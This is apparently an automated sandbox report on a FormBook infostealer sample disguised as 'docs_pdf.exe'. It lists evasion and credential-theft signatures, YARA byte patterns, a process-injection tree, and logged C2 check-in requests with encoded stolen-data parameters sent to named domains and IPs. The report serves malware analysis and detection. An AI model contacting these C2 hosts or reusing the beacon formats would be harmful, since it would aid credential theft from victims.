
Windows Analysis Report
docs_pdf.exe

Overview

General Information

Sample name:docs_pdf.exe
Analysis ID:1472520
MD5:942c50b985dc1e6eb49c1763d39d398f
SHA1:9de6943387aef034ae9d2eab93f4ef557aba7ad2
SHA256:455f3956ac0f7082228d48ed98ff0ea1d6f2cef1c01f6dc263502696e6a9a5b7
Tags:exe

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • docs_pdf.exe (PID: 3340 cmdline: "C:\Users\user\Desktop\docs_pdf.exe" MD5: 942C50B985DC1E6EB49C1763D39D398F)
    • svchost.exe (PID: 5600 cmdline: "C:\Users\user\Desktop\docs_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • qsWkdNJOHuxNQUCXoUm.exe (PID: 5788 cmdline: "C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • clip.exe (PID: 3140 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
          • qsWkdNJOHuxNQUCXoUm.exe (PID: 4484 cmdline: "C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5676 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a990:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2cd53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x162c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2db53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x170c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ParentImage: C:\Users\user\Desktop\docs_pdf.exe, ParentProcessId: 3340, ParentProcessName: docs_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ProcessId: 5600, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine: "C:\Users\user\Desktop\docs_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ParentImage: C:\Users\user\Desktop\docs_pdf.exe, ParentProcessId: 3340, ParentProcessName: docs_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\docs_pdf.exe", ProcessId: 5600, ProcessName: svchost.exe
            Timestamp:07/13/24-00:07:48.656337
            SID:2855464
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:08:53.091829
            SID:2855464
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:08:18.355432
            SID:2855464
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:08:39.497873
            SID:2855464
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:09:06.939506
            SID:2855464
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:07:46.120127
            SID:2855464
            Source Port:49737
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:08:55.622362
            SID:2855464
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:08:15.823053
            SID:2855464
            Source Port:49742
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:09:09.468816
            SID:2855464
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/13/24-00:08:42.029982
            SID:2855464
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected


            AV Detection

            barindex
            Source: http://www.xn--matfrmn-jxa4m.seAvira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/Avira URL Cloud: Label: malware
            Source: http://www.xn--matfrmn-jxa4m.se/4hda/?tDA=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Y2AhR=fDNdZPHH1hsp8rrpAvira URL Cloud: Label: malware
            Source: docs_pdf.exeReversingLabs: Detection: 44%
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: docs_pdf.exeJoe Sandbox ML: detected
            Source: docs_pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000000.1765523436.0000000000BAE000.00000002.00000001.01000000.00000004.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1906921154.0000000000BAE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: docs_pdf.exe, 00000000.00000003.1671817009.0000000003700000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.1669880230.0000000003510000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1842619722.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1842619722.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753116233.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751590733.0000000003000000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2915473756.0000000004850000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1844741121.00000000046A5000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1842535951.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2915473756.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: docs_pdf.exe, 00000000.00000003.1671817009.0000000003700000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.1669880230.0000000003510000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1842619722.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1842619722.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753116233.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1751590733.0000000003000000.00000004.00000020.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000002.2915473756.0000000004850000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1844741121.00000000046A5000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1842535951.00000000044F0000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2915473756.00000000049EE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1842505416.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1811670613.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914301789.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.2913704315.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2916160322.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1907126473.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.000000000594C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.2913704315.0000000002B55000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2916160322.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1907126473.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.000000000594C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1842505416.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1811670613.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914301789.0000000000808000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01014696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_01014696
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101C93C FindFirstFileW,FindClose,0_2_0101C93C
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0101C9C7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0101F35D
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0101F200
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0101F65E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01013A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01013A2B
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01013D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01013D4E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0101BF27
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0279BC20 FindFirstFileW,FindNextFileW,FindClose,3_2_0279BC20
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then xor eax, eax3_2_02789870
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4x nop then mov ebx, 00000004h3_2_0471053E

            Networking

            barindex
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49737 -> 217.160.0.106:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49738 -> 217.160.0.106:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49742 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49743 -> 208.91.197.27:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 43.252.167.188:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 43.252.167.188:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 194.9.94.85:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 194.9.94.85:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 23.251.54.212:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49755 -> 23.251.54.212:80
            Source: Joe Sandbox ViewIP Address: 194.9.94.85 194.9.94.85
            Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
            Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
            Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_010225E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_010225E2
            Source: global trafficHTTP traffic detected: GET /w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.hprlz.czConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qe66/?tDA=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&Y2AhR=fDNdZPHH1hsp8rrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.catherineviskadi.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xzzi/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.bfiworkerscomp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rm91/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--fhq1c541j0zr.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /4hda/?tDA=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&Y2AhR=fDNdZPHH1hsp8rrp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.xn--matfrmn-jxa4m.seConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.hprlz.cz
            Source: global trafficDNS traffic detected: DNS query: www.catherineviskadi.com
            Source: global trafficDNS traffic detected: DNS query: www.hatercoin.online
            Source: global trafficDNS traffic detected: DNS query: www.fourgrouw.cfd
            Source: global trafficDNS traffic detected: DNS query: www.bfiworkerscomp.com
            Source: global trafficDNS traffic detected: DNS query: www.tinmapco.com
            Source: global trafficDNS traffic detected: DNS query: www.xn--fhq1c541j0zr.com
            Source: global trafficDNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS traffic detected: DNS query: www.anuts.top
            Source: unknownHTTP traffic detected: POST /qe66/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brHost: www.catherineviskadi.comOrigin: http://www.catherineviskadi.comCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.catherineviskadi.com/qe66/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Data Ascii: tDA=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 12 Jul 2024 22:07:46 GMTServer: ApacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 12 Jul 2024 22:07:49 GMTServer: ApacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Fri, 12 Jul 2024 22:07:51 GMTServer: ApacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Fri, 12 Jul 2024 22:07:54 GMTServer: ApacheData Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:14:44 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 12 Jul 2024 22:14:46 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>
